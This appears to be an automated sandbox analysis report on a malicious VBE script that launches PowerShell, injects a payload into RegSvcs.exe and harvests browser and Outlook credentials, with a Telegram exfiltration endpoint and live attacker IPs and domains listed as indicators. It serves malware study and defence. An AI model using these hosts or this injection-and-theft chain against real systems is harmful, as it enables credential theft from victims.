                Source: wscript.exe, 00000000.00000002.1860443892.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1850754950.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698784880.0000014AD4D56000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1851807052.0000014AD4D53000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1850754950.0000014AD4D53000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1851807052.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698784880.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860443892.0000014AD4D54000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1705757894.0000014AD4D57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1705757894.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000E.00000003.2742480691.0000017C07AC7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000000.00000003.1852355017.0000014AD4D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1852640806.0000014AD4D0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1854323961.0000014AD4D0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860304459.0000014AD4D0E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@
                Source: RegSvcs.exe, 0000000C.00000002.2950405030.00000000012FA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0161EF88 LdrInitializeThunk,LdrInitializeThunk,12_2_0161EF88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\System32\wscript.exe | Network Connect: 144.91.79.54 80
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1160000 value starts with: 4D5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1160000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1162000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 117A000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 117C000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EE7008
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" (2 occurrences)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7064" "2696" "2648" "2700" "0" "0" "2704" "0" "0" "0" "0" "0"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1888" "2588" "2776" "2068" "0" "0" "2076" "0" "0" "0" "0" "0"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (4 occurrences)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (11 occurrences)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

Source: Yara match | File source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5184, type: MEMORYSTR
Source: Yara match | File source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5184, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5184, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5184, type: MEMORYSTR
Source: Yara match | File source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5184, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; the digits preceding a technique name are the signature-count badges the report attaches to matched techniques)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: 211 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Windows Management Instrumentation; 1 Exploitation for Client Execution; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 211 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 1 DLL Side-Loading; 311 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Disable or Modify Tools; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 311 Process Injection; 1 Rundll32
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 2 File and Directory Discovery; 14 System Information Discovery; 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph (ID: 1557622; Sample: Ref#150062.vbe; Start date: 18/11/2024; Architecture: WINDOWS; Score: 100)

Root node (the sample): contacted reallyfreegeoip.org, jertcot.shop and 2 other IPs or domains. Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Yara detected Telegram RAT; 4 other signatures. Started processes: wscript.exe (node 8), wscript.exe (node 11), wscript.exe (node 14), rundll32.exe (node 16).
- reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP).
- wscript.exe (node 8): Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage). Started: powershell.exe (node 18), powershell.exe (node 21).
- wscript.exe (node 11): connects to 144.91.79.54 (ports 49730, 49731, 49732; CONTABODE, Germany). Signatures: System process connects to network (likely due to code injection or exploit); Potential evasive VBS script found (sleep loop); Suspicious execution chain found.
- powershell.exe (node 18): Writes to foreign memory regions; Injects a PE file into a foreign processes. Started: RegSvcs.exe (node 23), wermgr.exe (node 27), conhost.exe (node 29).
- powershell.exe (node 21): Started: wermgr.exe (node 31), conhost.exe (node 33).
- RegSvcs.exe (node 23): connects to jertcot.shop 162.254.34.31 (ports 49932, 587; VIVIDHOSTINGUS, United States); checkip.dyndns.com 193.122.6.168 (ports 49883, 80; ORACLE-BMC-31898US, United States); reallyfreegeoip.org 188.114.96.3 (ports 443, 49889; CLOUDFLARENETUS, European Union). Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc).

Source | Detection | Scanner | Label | Link
Ref#150062.vbe | 3% | ReversingLabs | |

No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://144.91.79.54/1211/Y | 0% | Avira URL Cloud | safe |
http://144.91.79.54/H | 0% | Avira URL Cloud | safe |
http://144.91.79.54/1211/cng | 0% | Avira URL Cloud | safe |
http://144.91.79.54/1211/r | 0% | Avira URL Cloud | safe |
http://144.91.79.54/ll | 0% | Avira URL Cloud | safe |
http://jertcot.shopd | 0% | Avira URL Cloud | safe |
http://144.91.79.54/1211/s | 0% | Avira URL Cloud | safe |
http://144.91.79.54:80/1211/file | 0% | Avira URL Cloud | safe |
http://jertcot.shop | 0% | Avira URL Cloud | safe |
http://144.91.79.54/0 | 0% | Avira URL Cloud | safe |
http://144.91.79.54/1211/cn | 0% | Avira URL Cloud | safe |
http://144.91.79.54/8 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 188.114.96.3 | true | false | | high
jertcot.shop | 162.254.34.31 | true | true | | unknown
checkip.dyndns.com | 193.122.6.168 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/155.94.241.187 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot | RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://144.91.79.54/1211/cng | wscript.exe, 00000000.00000003.1816534726.0000014AD4DAC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1814678830.0000014AD4DA0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://jertcot.shopd | RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://reallyfreegeoip.orgd | RegSvcs.exe, 0000000C.00000002.2951280494.000000000317D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://144.91.79.54/1211/Y | wscript.exe, 00000000.00000003.1855170962.0000014AD4D72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1850754950.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860544185.0000014AD4D73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1851807052.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org | RegSvcs.exe, 0000000C.00000002.2951280494.000000000314E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://jertcot.shop | RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://144.91.79.54/ll | wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/155.94.241.187l | RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.comd | RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://144.91.79.54/1211/r | wscript.exe, 00000000.00000003.1816091185.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1851523290.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1857344788.0000014AD6AB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1853417170.0000014AD6AB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860821496.0000014AD6AB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1719027708.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1852166734.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://144.91.79.54/H | wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/q | RegSvcs.exe, 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://144.91.79.54/ | wscript.exe, 00000000.00000003.1718508588.0000014AD4D89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718673514.0000014AD4D97000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://144.91.79.54:80/1211/file | wscript.exe, 00000000.00000003.1852355017.0000014AD4D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1852640806.0000014AD4D0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1854323961.0000014AD4D0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860304459.0000014AD4D0E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://reallyfreegeoip.org | RegSvcs.exe, 0000000C.00000002.2951280494.000000000317D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.orgd | RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://144.91.79.54/0 | wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://144.91.79.54/1211/s | wscript.exe, 00000000.00000003.1698784880.0000014AD4D56000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.com | RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://144.91.79.54/1211/cn | wscript.exe, 00000000.00000003.1816091185.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/d | RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 0000000C.00000002.2951280494.00000000030E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/155.94.241.187d | RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot-/sendDocument?chat_id= | RegSvcs.exe, 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://144.91.79.54/8 | wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/ | RegSvcs.exe, 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
144.91.79.54 | unknown | Germany | 51167 | CONTABODE | true
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
162.254.34.31 | jertcot.shop | United States | 64200 | VIVIDHOSTINGUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557622
Start date and time: 2024-11-18 13:42:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ref#150062.vbe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winVBE@16/19@3/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 28
• Number of non-executed functions: 46
Cookbook Comments:
• Found application associated with file extension: .vbe
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.21
• Excluded domains from analysis (whitelisted): licensing.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Ref#150062.vbe
Time     | Type            | Description
07:42:59 | API Interceptor | 12x Sleep call for process: wscript.exe modified
07:44:07 | API Interceptor | 124x Sleep call for process: powershell.exe modified
07:44:29 | API Interceptor | 20x Sleep call for process: RegSvcs.exe modified
07:44:43 | API Interceptor | 2x Sleep call for process: wermgr.exe modified
